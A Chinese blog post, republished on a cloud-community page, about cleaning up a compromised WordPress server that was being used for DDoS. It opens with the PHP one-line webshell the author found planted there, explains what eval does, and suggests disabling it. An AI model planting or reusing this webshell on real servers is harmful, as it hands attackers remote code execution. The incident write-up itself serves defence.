<?php @eval($_POST[8])?>

一周前,我账号下的几台服务器,有一台是朋友的,挂着他公司的网站,不知道,从月初开始,一直收到挂马的短信通知,更离谱的是成了肉鸡,流量异常,在远程DDoS别的机器,这万一让服务商吧服务器给处罚了......就不好了。开始我也没在乎,也许是被扫到了。但是成了肉鸡之后,我决定看一下。

首先,他的网站用的是wordpress OS(最近漏洞消息不断,我昨天收到的邮件里,有一封是关于这个)

这里插一句,全球有27%左右的网站用的这个系统。

至于那台服务器是如何被入侵的,我看了一看服务器了的文件,有连个个.php文件:

里面的代码就是我写的标题。

这是传说中的一句话木马。eval可以用来执行任何其他php代码,危险系数比较大。

删掉这些文件,密码改掉,可能的漏洞已修补,完事(这几天没有收到信息,不过过几天怎么样,哈哈就不敢说了)。

有的网站的站长,有些是不懂技术的,对上上边的这个eval函数,不用的话最好禁止一下。

下面是我找的禁止函数的方法。

有不少的站长,在维护自己的服务器的时候,托管方要找点靠谱点的,我说的这台服务器就是交给了第三方,我不敢说他们和黑产有多少联系,不过还是小心点好。

原文发布于微信公众号 - 数据库SQL(SQLdba)

原文发表时间:2016-11-27

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏流星博客

有毒的二维码和链接?请不要误导大家好吗?

今天在知乎上看到的一篇文章,本想分享给某群的群友们看的,结果刚分享就有人说广告?!我说不是,结果他说链接有毒?!!

1856
来自专栏FreeBuf

挖洞经验 | 看我如何综合利用4个漏洞实现GitHub Enterprise 远程代码执行

大家好,距离上次漏洞披露已有半年之余,在这篇文章中,我将向大家展示如何通过4个漏洞完美实现GitHub Enterprise的RCE执行,该RCE实现方法与服务...

3946
来自专栏张善友的专栏

.Net 跨平台可移植类库正在进行

[原文发表地址] Cross-Platform Portable Class Libraries with .NET are Happening [原文发表时间...

1769
来自专栏云计算教程系列

如何减轻memcached的放大攻击

在2018年2月27日,Cloudflare 和 Arbor Networks 公司于周二发出警告称,恶意攻击者正在滥用 Memcached 协议发起分布式拒绝...

1244
来自专栏IT大咖说

Mars在移动网络的探索和实践

摘要 Mars这个名字来自于电影《火星救援》,它是一个结合移动 App 所设计的基于 socket 层的解决方案,在网络调优方面有着更好的可控性。微信高级工程师...

3277
来自专栏西枫里博客

阿里短信通知的接入与实现。

随着《网络安全法》的出台,有关部门对互联网用户的管理逐步切换到实名制状态,这其中就包括用户评论留言功能需要遵循后台实名前台自愿的原则,未实名的用户将被禁止评论。...

541
来自专栏IMWeb前端团队

作为一个前端,可以如何机智地弄坏一台电脑?

有人说,前端的界限就在浏览器那儿。 无论你触发了多少bug,最多导致浏览器崩溃,对系统影响不到哪去。 这就像二次元各种炫酷的毁灭世界,都不会导致三次元的世界末日...

2070
来自专栏ionic3+

Ionic4与Ionic3部分比较

有较长时间没有用Ionic了,见新的公众号需求比较简单,便决定使用Ionic4来实现。

421
来自专栏我的安全视界观

[一起玩蛇】Python代码审计中的器II

1917
来自专栏飞雪无情的博客

Android 源码目录结构详解

这是Android2.1的源代码的目录结构,可以帮助我们研究Android的源代码。Android源代码的下载请参考官网

412

扫描关注云+社区